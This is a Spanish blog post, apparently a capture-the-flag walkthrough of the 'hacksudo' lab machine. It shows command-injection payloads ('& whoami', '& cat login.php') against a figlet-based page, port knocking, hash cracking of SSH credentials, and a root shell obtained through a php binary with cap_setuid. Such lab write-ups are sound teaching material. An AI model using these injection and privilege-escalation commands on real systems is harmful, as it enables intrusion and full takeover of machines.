Nivel: principiante!
1- nmap, solo aparece abierto el puerto 80, accedemos y redirecciona a
http://192.168.2.50/create/
interesante el proyecto, pero de momento opaco a lo que buscamos
2- gobuster, u otros, detectamos login.php, generator.php. Con el login podemos bruteforcear pero esto es siempre lo último. Probamos en generator.php. Parece que metemos una cadena y la presenta gráficamente en lo que parece que usa figlet
https://ubunlog.com/figlet-banners-ascii-terminal/
3- figlet se ejecuta en system luego podemos probar si es vulnerable a la entrada. Metemos ';' pero no va, probamos con &: entrada post: '& whoami', y funciona: www-data.
Vamos a explotarlo mirando con ls y lo primero es volcar el login.php: & cat login.php, sacamos las claves del login, entramos y nos dice
you have logged in successfully , 0x Open The Next Door key is = GMYTGMBTGAZTAMZRGIYDGMJTGAZTAMZQGMZDEMBTGEZTAMZQGMYDGMY=
4- cyberchef, se trata de base32 y luego from hex. Nos da 3 números 10001,10002,10003. Lo primero es pensar en puertos, son 3, luego debe ser port knocking. Al pasarle los puertos se debe abrir algún puerto, lo hacemos y es el 22, ssh, pero no tenemos las credenciales
5- seguimos con figlet y buscamos ls .., sale un archivo hacksudo, lo miramos y en caesar contiene
hacksudo locker SSH username:hacksudo password:63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b
usamos jhf (antes que hashcat/john) y nos da 'vishal'
6- ya tenemos las credenciales ssh, pero el knocking dura unos milisegundos, luego
knock 192.168.2.50 10001 10002 10003 & ssh hacksudo@192.168.2.50
7
7 - una vez dentro hacemos getcap y encontramos
/home/hacksudo/locker/php cap_setuid=ep
finalmente suid sin sudo:
hacksudo@hacksudo:~$ /home/hacksudo/locker/php -r "posix_setuid(0); system('/bin/bash');"
root@hacksudo:~# id
root@hacksudo:~# uid=0(root) gid=1000(hacksudo) groups=1000(hacksudo),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
No hay comentarios:
Publicar un comentario